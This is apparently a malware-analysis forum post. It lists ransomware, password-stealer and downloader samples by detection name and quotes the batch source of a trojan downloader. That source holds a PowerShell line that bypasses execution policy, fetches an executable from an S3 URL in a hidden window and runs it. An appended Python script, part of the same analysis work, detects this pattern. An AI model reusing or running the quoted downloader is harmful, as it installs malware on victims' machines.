ikolor wrote: Next ..
No I do not have it.
https://www.virustotal.com/en/file/7dba ... /analysis/
https://www.virustotal.com/en/file/ccd3 ... 467829542/
t3.exe - Ransom/Falock
complaint65648.pdf.bat - PowerShell/Ploprolo (trojan downloader)
email.exe - MSIL/Silog (PWS)
ewinoz.exe - MSIL/Silog (PWS)
updater.exe - MSIL/Noancooe
From my point of view, the most interesting thing in this package of complete crapware (even by malware standards) is Ploprolo:
Code:
@ECHO OFF
start /min
REM  QBFC Project Options Begin
REM  HasVersionInfo: Yes
REM  Companyname: Tbfdgrsbnfouhdfbvifdb LLC
REM  Productname: ifnbfdnibdfbijdfn
REM  Filedescription: 
REM  Copyrights: Copyright 2013. All Rights Reserved. vojnfdjbnijdfbnidf LLC
REM  Trademarks: 
REM  Originalname: 
REM  Comments: 
REM  Productversion:  1. 3. 1. 2
REM  Fileversion:  1. 3. 0. 2
REM  Internalname: 
REM  Appicon: 
REM  AdministratorManifest: No
REM  QBFC Project Options End
@echo off
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://s3-us-west-1.amazonaws.com/docs.pdf/t4.exe','%APPDATA%\winstrt.exe'); cmd /c '%APPDATA%\winstrt.exe'
 
So this zoo has been moved to a dedicated thread.
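As an added example (not part of the original post), here is a small Python triage helper for the pattern visible in the batch file quoted above: QBFC project-option comments, PowerShell started with bypass/noprofile/hidden switches, and `WebClient.DownloadFile` followed by execution of the dropped file. The function name `analyze`, the finding keys, and the sample script with its placeholder URL and file name are constructed for illustration.

```python
import re

# Constructed sample modelled on the quoted dropper; URL and file name are placeholders.
SAMPLE = r"""@ECHO OFF
REM  QBFC Project Options Begin
REM  AdministratorManifest: No
REM  QBFC Project Options End
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://example.invalid/payload.exe','%APPDATA%\sample.exe'); cmd /c '%APPDATA%\sample.exe'
"""

# powershell.exe accepts abbreviated switch names (-ep, -exec, -nop, -w),
# so the patterns match prefixes rather than only the full spelling.
FLAGS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|ex\w*)\s+bypass\b", re.I),
    "no_profile": re.compile(r"-nop\w*", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden\b", re.I),
}
QBFC = re.compile(r"\s*REM\s+QBFC Project Options Begin", re.I)
DOWNLOAD = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)


def analyze(script):
    """Return a dict describing download-and-execute indicators in a batch script."""
    found = {"qbfc_header": False, "flags": [], "downloads": [],
             "executes_download": False}
    for line in script.splitlines():
        if QBFC.match(line):
            found["qbfc_header"] = True
        if "powershell" not in line.lower():
            continue
        found["flags"] += [name for name, rx in FLAGS.items()
                           if rx.search(line) and name not in found["flags"]]
        for m in DOWNLOAD.finditer(line):
            url, dest = m.groups()
            found["downloads"].append((url, dest))
            # The dropped path reappearing after the download call means
            # the same command line also launches the file.
            if dest.lower() in line[m.end():].lower():
                found["executes_download"] = True
    found["suspicious"] = bool(found["downloads"]) and found["executes_download"]
    return found


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```
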